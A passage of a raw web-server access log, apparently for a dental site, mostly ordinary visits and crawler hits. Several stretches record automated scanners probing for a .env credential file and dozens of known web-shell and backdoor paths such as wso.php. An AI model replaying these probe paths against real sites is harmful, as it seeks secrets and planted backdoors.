(iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:06:01:38 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 212.143.94.239 - - [13/Aug/2025:06:07:18 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 31.186.39.146 - - [13/Aug/2025:06:09:28 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 69.171.231.112 - - [13/Aug/2025:06:12:15 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 206.189.247.132 - - [13/Aug/2025:06:15:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:06:15:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:06:15:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:06:15:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 4.43.184.114 - - [13/Aug/2025:06:22:01 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13" 128.199.106.124 - - [13/Aug/2025:06:22:58 -0400] "GET /.env HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 173.252.79.5 - - [13/Aug/2025:06:28:20 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 206.189.247.132 - - [13/Aug/2025:06:30:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:06:30:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:06:30:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:06:30:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 13.76.76.189 - - [13/Aug/2025:06:43:33 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:33 -0400] "GET /as.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:33 -0400] "GET /403.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:33 -0400] "GET /max.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /m.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /post.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /themes.php HTTP/1.1" 301 241 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 255 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /conflg.php?p= HTTP/1.1" 301 244 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /click.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /install.php HTTP/1.1" 301 242 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /lv.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:34 -0400] "GET /simple.php HTTP/1.1" 301 241 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /css.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /up.php?x= HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /cong.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /fw.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /bs1.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /bless.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /file.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:35 -0400] "GET /mail.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /11.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /6.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /3.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /48.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /a3.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /v.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /vv.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:36 -0400] "GET /error.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /48.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /blue.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /oo.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /0.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /00.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /f35.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /moon.php= HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:37 -0400] "GET /flash.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /10.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /36.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /midnight.php HTTP/1.1" 301 243 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /star.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /ff.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /jp.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /2.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /02.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:38 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:39 -0400] "GET /goods.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:39 -0400] "GET /admin.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:39 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:39 -0400] "GET /moon.php?p= HTTP/1.1" 301 242 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:39 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:39 -0400] "GET /manager.php?p= HTTP/1.1" 301 245 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /chosen.php HTTP/1.1" 301 241 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /f.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /504.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /radio.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /wso.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /f35.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:40 -0400] "GET /form3.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /content.php HTTP/1.1" 301 242 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /lyns.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /xmlrpc.php HTTP/1.1" 301 241 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /mah.php?p= HTTP/1.1" 301 241 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /fm.php?p= HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /file.php? HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /psh.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /let.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:41 -0400] "GET /multi.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /item.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /ay.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /new.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /nf.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /pwnd.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /post.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /moon.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:42 -0400] "GET /lv.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:43 -0400] "GET /goto.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:43 -0400] "GET /ff.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:43 -0400] "GET /fopen.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:43 -0400] "GET /x.php HTTP/1.1" 301 236 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:43 -0400] "GET /we2.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:43 -0400] "GET /af32.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:43 -0400] "GET /techl.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:44 -0400] "GET /el.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:44 -0400] "GET /rz.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:44 -0400] "GET /icon.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:44 -0400] "GET /sts.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:44 -0400] "GET /first.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:44 -0400] "GET /cof.php HTTP/1.1" 301 238 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /searchl.php HTTP/1.1" 301 242 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /up.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /info.php HTTP/1.1" 301 239 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /db.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /gecko.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /go.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /OK.php HTTP/1.1" 301 237 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /ty.php?p= HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:45 -0400] "GET /astab.php HTTP/1.1" 301 240 "-" "-" 13.76.76.189 - - [13/Aug/2025:06:43:46 -0400] "GET /abe.php HTTP/1.1" 301 238 "-" "-" 173.252.79.113 - - [13/Aug/2025:06:47:01 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 86.8.204.43 - - [13/Aug/2025:06:47:23 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:06:47:23 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:06:47:23 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:06:47:23 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:07:03:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:07:03:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:07:03:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:07:03:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 69.171.249.9 - - [13/Aug/2025:07:13:51 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 86.8.204.43 - - [13/Aug/2025:07:19:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:07:19:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:07:19:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:07:19:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 66.249.73.65 - - [13/Aug/2025:07:28:42 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.73.66 - - [13/Aug/2025:07:28:44 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 104.47.56.126 - - [13/Aug/2025:07:32:34 -0400] "HEAD /send.php HTTP/1.1" 301 - "-" "-" 86.8.204.43 - - [13/Aug/2025:07:33:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:07:33:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:07:33:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:07:33:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 72.152.84.126 - - [13/Aug/2025:07:38:49 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.92 Safari/537.36" 86.8.204.43 - - [13/Aug/2025:07:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:07:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:07:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:07:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 216.73.216.186 - - [13/Aug/2025:07:48:42 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 66.220.149.115 - - [13/Aug/2025:07:59:32 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 206.189.247.132 - - [13/Aug/2025:08:01:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:08:01:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:08:01:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:08:01:37 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 4.43.184.114 - - [13/Aug/2025:08:09:03 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.53 Safari/533.4" 86.8.204.43 - - [13/Aug/2025:08:15:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:08:15:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:08:15:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:08:15:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 193.36.224.226 - - [13/Aug/2025:08:18:02 -0400] "GET / HTTP/1.1" 301 231 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:04 -0400] "GET //cjfuns.php HTTP/1.1" 301 241 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:06 -0400] "GET /wp-content/index.php HTTP/1.1" 301 251 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:07 -0400] "GET /wp-admin/js/widgets/file.php HTTP/1.1" 301 259 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:07 -0400] "GET /cong.php HTTP/1.1" 301 239 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:08 -0400] "GET /xxc.php HTTP/1.1" 301 238 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:09 -0400] "GET /wp-amin/includes/file.php HTTP/1.1" 301 256 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:09 -0400] "GET /phpmailer.lang-sv.php HTTP/1.1" 301 252 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:10 -0400] "GET /wp-includes/Requests/Text/index.php HTTP/1.1" 301 266 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:11 -0400] "GET /images/plugins.php HTTP/1.1" 301 249 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:11 -0400] "GET /wp-content/moderation.php HTTP/1.1" 301 256 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:12 -0400] "GET /cjfuns.php HTTP/1.1" 301 241 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:13 -0400] "GET /nf_tracking.php HTTP/1.1" 301 246 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:13 -0400] "GET /wso.php HTTP/1.1" 301 238 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:14 -0400] "GET /wp-seo.php HTTP/1.1" 301 241 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:15 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:16 -0400] "GET /users.php HTTP/1.1" 301 240 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:17 -0400] "GET /wp-admin/includes/themes.php HTTP/1.1" 301 259 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:17 -0400] "GET /beence.php HTTP/1.1" 301 241 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:18 -0400] "GET /warm.PhP7 HTTP/1.1" 301 240 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:19 -0400] "GET //cong.php HTTP/1.1" 301 239 "-" "Go-http-client/1.1" 104.234.19.151 - - [13/Aug/2025:08:18:19 -0400] "GET /wp-content/plugins/ HTTP/1.1" 301 250 "-" "Go-http-client/1.1" 206.189.247.132 - - [13/Aug/2025:08:30:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:08:30:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 